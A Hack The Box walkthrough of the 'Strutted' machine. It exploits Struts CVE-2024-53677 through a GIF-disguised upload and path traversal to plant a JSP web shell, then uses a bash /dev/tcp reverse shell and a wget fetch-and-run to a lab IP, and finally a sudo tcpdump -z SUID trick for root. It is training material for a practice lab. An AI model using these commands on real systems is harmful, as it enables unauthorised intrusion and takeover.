Strutted (HTB)

Intro

Hello my lovely fellows Today new day and new machine let's jump into it.

Enumeration

Port scanning.

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+m7rYl1vRtnm789pH3IRhxI4CNCANVj+N5kovboNzcw9vHsBwvPX3KYA3cxGbKiA0VqbKRpOHnpsMuHEXEVJc=
|   256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtuEdoYxTohG80Bo6YCqSzUY9+qbnAFnhsk4yAZNqhM
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-title: Did not follow redirect to http://strutted.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Classic 80,22 machine. Let's check what does the website have for us.

Website enumeration.

Once we enter the website we going to see this upload functionality.

There is a lot a way to download the application. Let's download and see what we have there before we go and test this.

First thing we see a tomcat user. I did some Directory brute-force as well as sub domain enumeration but nothing was there.

CVE-2024-53677

After looking in the source code a bit i came across this version of Struts which used in the application backend. Looking around the internet of its version

    <properties>
        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
        <maven.compiler.source>17</maven.compiler.source>
        <maven.compiler.target>17</maven.compiler.target>
        <struts2.version>6.3.0.1</struts2.version>
        <jetty-plugin.version>9.4.46.v20220331</jetty-plugin.version>
        <maven.javadoc.skip>true</maven.javadoc.skip>
        <jackson.version>2.14.1</jackson.version>
        <jackson-data-bind.version>2.14.1</jackson-data-bind.version>
    </properties>

We going to find this.

LogoNVD - CVE-2024-53677

It has a known CVE. Which is basically a flow in the uploading mechanism allow the attacker path traversal and in some cases file upload.

Shell as tomcat

So basically the vulnerability allow us to upload file and via implementation error in FileUploadIntercepto` we can upload file and traversal the system to choose where this file will live on the disk. This is how we can exploit it..

  1. First we need to capture an upload request via burp suit or what ever proxy you using.

  2. Then we need to trick it into think that the uploaded is a sort of image gif png jpg etc..

  3. After we do that we going to abuse the top.UploadFileName which will allow us to place the upload file into where ever we want into the disk.

  4. We use the payload ....

Here is the sloution.

i used this payload

https://raw.githubusercontent.com/TAM-K592/CVE-2024-53677-S2-067/refs/heads/ALOK/shell.jsp

Here we tricking the server into thinking this is a gif . Also notice that we change the case for the upload name.

Here we choose where we put the file. Two step back to place it into the the root directory for it to be easily accessible. And simply using this curl command we can execute shell commands on the server

curl 'http://strutted.htb/shell.jsp?action=cmd&cmd=id'

from here you can do what ever you want to get shell as for me i did it this way.

  1. Open python server and host a revers shell

  2. use wget on the target machine and upload it into the server

  3. change its permissions

  4. execute it.

This is the payload i hosted.

sh -i >& /dev/tcp/10.10.16.111/9001 0>&1

For the python server

python3 -m http.server <PORT>

This is the wget command. and the other commands

Documents/hackTheBox/Strutted via  v3.13.7
❯ curl -G 'http://strutted.htb/shell.jsp?action=cmd' --data-urlencode "cmd=wget http://10.10.16.111:9090/shell -O /tmp/shell"


GIF87a



Documents/hackTheBox/Strutted via  v3.13.7
❯ curl -G 'http://strutted.htb/shell.jsp?action=cmd' --data-urlencode "cmd=ls /tmp"


GIF87a


hsperfdata_tomcat
shell
sqlite-3.47.1.0-7dc50d4f-631b-491f-8888-643f936c6614-libsqlitejdbc.so
sqlite-3.47.1.0-7dc50d4f-631b-491f-8888-643f936c6614-libsqlitejdbc.so.lck

Documents/hackTheBox/Strutted via  v3.13.7
❯ curl -G 'http://strutted.htb/shell.jsp?action=cmd' --data-urlencode "cmd=chmod +x /tmp/shell"


GIF87a


Documents/hackTheBox/Strutted via  v3.13.7
❯ curl -G 'http://strutted.htb/shell.jsp?action=cmd' --data-urlencode "cmd=bash /tmp/shell"


<html>
<head><title>504 Gateway Time-out</title></head>
<body>
<center><h1>504 Gateway Time-out</h1></center>
<hr><center>nginx/1.18.0 (Ubuntu)</center>
</body>
</html>

And here is out shell.

Shell as james.

From there we just go into the conf file we going to find tomcat-users.xml which include a password.

This is what we looking for.

Funny thing.

For Some odd reasons when you tried to su from the web shell into the user james it does not work so i did not bother to check from ssh first because i thought it was wrong in the beginning, when i lost hope i tried there and it just worked .... <:)

Anyway. And if you ask how did i found the user james just check the /etc/passwd file.

Shell as Root.

the process the get shell as root was surprisingly easy i really did not excepted to be this way so am not going to spend much time.

use sudo -l to find what extra permissions you have.

Using the classic website gtfobins we can find a way to get root.

Logotcpdump | GTFOBins

Simply we abusing a flag -z which will execute some script after it finish the logging process.

As you may expect now just create a script that do for example change the permission of /bin/bash and add sbit into it. And execute it to be root.

If you wondering what is sbit is just an extra bit in the permissions that state whomever execute this file will get the same permissions as the file owner so guess what if /bin/bash is own by root and it got sbit then it will be executed as root and we will get shell as root.

This is the exploit i used.

#!/bin/bash
chmod 4777 /bin/bash

and just simply run this command.

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z <PATH> -Z root

Replace the path with the path to your exploit.

and in my case i just check the /bin/bash and i saw this.

But be careful. if you just execute it like that, New Linux machines will drop the permissions for no reason so you need to use the flag -p to avoid that.

Closing.

And here you have it a quick and easy machine. The initial access was interesting i will be writing an exploit for it soon as more of a practice but for now enjoy your rest of the day... 👍

PreviousCVE-2024-27198NextDog (HTB)

Last updated